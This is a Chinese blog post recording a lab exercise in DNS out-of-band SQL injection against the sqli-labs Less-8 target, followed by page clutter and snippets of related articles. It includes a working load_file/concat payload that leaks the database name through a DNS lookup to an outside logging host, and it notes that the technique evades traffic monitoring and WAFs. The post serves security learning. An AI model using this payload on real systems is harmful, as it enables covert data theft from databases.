【sql注入之dns带外通信实践】

已于 2022-05-29 22:32:08 修改
阅读量1k 收藏
点赞数
分类专栏: 理论知识 文章标签: web安全 安全
于 2022-05-29 22:29:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_40646572/article/details/125037397
版权

带外通信技术,通常使用在无法直接利用漏洞获得回显的,但目标确实存在漏洞的情况下使用,通过DNS请求就可以把想获得的数据外带出来。
带外通信使用在sql注入的条件如下:
在这里插入图片描述
部分文章介绍带外通信时,提及需要设置 secure_auth=ON并且secure_file_priv=’‘。但我在环境实现时发现,只需要设置下secure_file_priv=’‘即可,当然可能时因为版本的问题。我使用的mysql版本如下:
在这里插入图片描述
使用的dnslog是用的ceye平台的,自己个人资料中的标识符中的地址就是dns回显地址。
在这里插入图片描述

http://x.x.x.x/sqlilabs/Less-8/?id=1' and load_file(concat("//",database(),".dns_log地址/test")) -- -

在这里插入图片描述

实践成功。
如此,可以使用带外通信的方法绕过流量监测,过waf。

参考链接

「Burpsuite练兵场」SQL注入之带外通信:http://t.zoukankan.com/ichunqiu-p-13645542.html.
SQL注入(Dns注入):https://blog.youkuaiyun.com/weixin_38237216/article/details/124109790.

数据库外带——DNS注入
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-14 1277
Mysql注入——DNS注入 靶场地址 原理:利用UNC路径去访问服务器,dns会有日志,通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录,此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志 1.,我们看到靶场,首先尝试最简单的get传参,注入 它是直接将id传参拼接进去,然后用mysqli_connect()函数进行针对数据库的查询,我们顺理成章再后面输入内容?id=1进行测试 页面正常,继续
SQL注入DNS_log注入
weixin_47785246的博客
07-11 946
SQL注入DNS_log注入 这篇文章将系统的讲解,SQL注入中的DNS_log注入的原理、方法、以及靶场练习writeup。 文章目录SQL注入DNS_log注入前言一、DNS_log注入原理二、靶场实战1.DNSlog 平台2.封神台靶场总结 前言 关于SQL注入的详细内容请看我之前写的文章 提示:以下是本篇文章正文内容,下面案例可供参考 一、DNS_log注入原理 我们都知道,DNS解析是一种用户访问域名时,客户端向DNS发起DNS查询的到目标服务器ip地址,进而实现通信的机制,而
SQL注入DNSLog外带注入
dragon的博客
02-21 3337
什么是dnslog呢?DNS就是域名解析服务,把一个域名转换成对应的IP地址,转换完成之后,DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息,这个日志就叫DNSLog。但是想要查看DNSLog信息的人,必须是拥有DNS服务器权限的人,这就使的我们要是用dnslog注入方法的话,就需要搭建自己的一个dns服务器,成本相对较高。所以在此就推荐两个平台,可以快速让我们使用dnslog外带注入也可以使用BurpSuite同样可以实现相应功能。
DNS数据外带
最新发布
2301_78866120的博客
04-02 939
DNS数据外带
sql注入利用dnslog外带数据快速注入
weixin_56023251的博客
08-08 2205
sql注入时为布尔盲注、时间盲注,注入的效率低且线程高容易被waf拦截,又或者是目标站点没有回显,我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功,这时候就要用到我们的DNSlog注入Dns在域名解析时会留下域名和解析ip的记录,利用这点我们可以使用Dnslog(日志)记录显示我们的注入结果。mysql读入文件时 首先需要将secure_file_priv的默认值为null ,只需要在my.ini修改secure_file_priv=''2.开启了LOAD_FILE() 读取文件的函数。.
MySQL注入Dns 注入
baimaozi008的博客
05-29 1200
本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全来的经济损失。通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。然后1806dl.dnslog.cn的子域名的解析都是在某台服务器,然后他记录下来了有人请求访问了error.1806dl.dnslog.cn,然后在DnsLog这个平台上面显示出来了。
写bat脚本双击执行
qq_35911118的博客
04-08 3137
@echo off           不显示后续命令行及当前命令行 dir c:*.* >a.txt       将c盘文件列表写入a.txt call c:\ucdos\ucdos.bat    调用ucdos echo 你好            显示"你好" pause              暂停,等待按键继续 rem 准备运行wps         注释:准备运行wps cd ucdos            进入ucdos目录 wps               运行wps @echo
Sql注入漏洞汇总-上
黑战士的博客
06-04 814
DNSlog注入,也叫DNS查询,它是属于通信的一种(Out of Band,简称OOB)。寻常的注入基本都是在同一个信道上面的,比如正常的get注入,先在url上插入payload做HTTP请求,然后得到HTTP返回包,没有涉及其他信道。而所谓的通信,至少涉及两个信道信道:在计算机中指通信的通道,是信号传输的媒介。
SQL注入攻击与防御
10-04
本书作者均是专门研究SQL注入安全专家,他们集众家之长,对应用程序的基本编码和升级维护进行全面跟踪,详细讲解可能引发SQL注入的行为以及攻击者的利用要素,并结合长期实践经验提出了相应的解决方案。针对SQL...
SQL注入攻击与防御(安全技术经典译丛)
02-19
本书作者均是专门研究SQL注入安全专家,他们集众家之长,对应用程序的基本编码和升级维护进行全面跟踪,详细讲解可能引发SQL注入的行为以及攻击者的利用要素,并结合长期实践经验提出了相应的解决方案。针对SQL...
【THM】SQL Injection(SQL注入)-初级渗透测试
追风少年亚索的博客
03-29 2364
撰写本文目的仅仅提供个人查看笔记用途,大家可以去官网查看,都一样的
SQL注入 - Part 3(
捡破烂日记^ ^
05-23 809
本篇主要是思路概述(sql注入新思路+waf)
DNS外带注入
weixin_52501704的博客
10-09 1661
DNS外带注入
SQL注入之利用DNSlog外带盲注回显
baynk的博客
03-31 6366
0x00 SQL盲注 当我们发现一个站点存在一个没有数据回显的注入点进行注入时,只能采取盲注,这种注入速度非常慢,需要一个一个字符猜解,而且很容易被网站BAN掉IP,虽然也可以使用代理IP池,但是还是需要一种快速有效的方法来获取数据。 此时我们就可以利用DNSlog来快速的获取数据,当然我们也可以在无回显的命令执行或者无回显的SSRF中利用。 0x01 DNSlog利用条件 DBMS中需要有可...
day30 SQL注入&CTF&二次&堆叠&DNS
wanjia01的博客
11-22 799
详细点来讲,就是在第一次进行数据库插入数据的时候,仅仅只是使用了 addslashes 或者是借助 get_magic_quotes_gpc 对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来的数据,但是数据本身还是脏数据。在下一次进行需要进行查询的时候,直接从数据库中取出了脏数据,没有进行进一步的检验和处理,这样就会造成SQL的二次注入。第一次进行数据库插入数据的时候,仅仅对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来的数据,但是数据本身包含恶意内容。查看数据库,已经添加成功。
sql注入sqlmap+DNSlog外带数据 注入复现
C_LCH_2000的博客
08-19 2355
DNSlog注入 dnslog注入原理通过子查询,将内容拼接到域名内,查询相应的dns解析记录,来获取我们想要的数据 利用场景 在sql注入为布尔盲注、时间盲注时,如果遇到大量的数据,注入的效率将十分低下且耗时,用sqlmap还容易被waf拦截,IP被ban,这种情况就可用利用内置文件读取函数 load_file()来完成 DNSlog注入
dns缓存
qq_35543858的博客
01-25 840
查看dns缓存 ipconfig/displaydns 清除dns缓存 ipconfig/flushdns DNS缓存介绍 记录种类 A记录是指定域名对应的IP地址。 AAAA记录一个域名对应的IPv6地址 NS记录 是指定由哪个DNS服务器解析你的域名。 MX记录 是指邮件交换记录,记录了在当前网络下,存在的mail服务器 CNAME记录 是指别名记录,允许多个域名对应一个ip ...
DNSlog外带数据注入
C_LCH_2000的博客
08-04 1580
盲注代替 DNS log即DNS日志,域名解析的记录。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值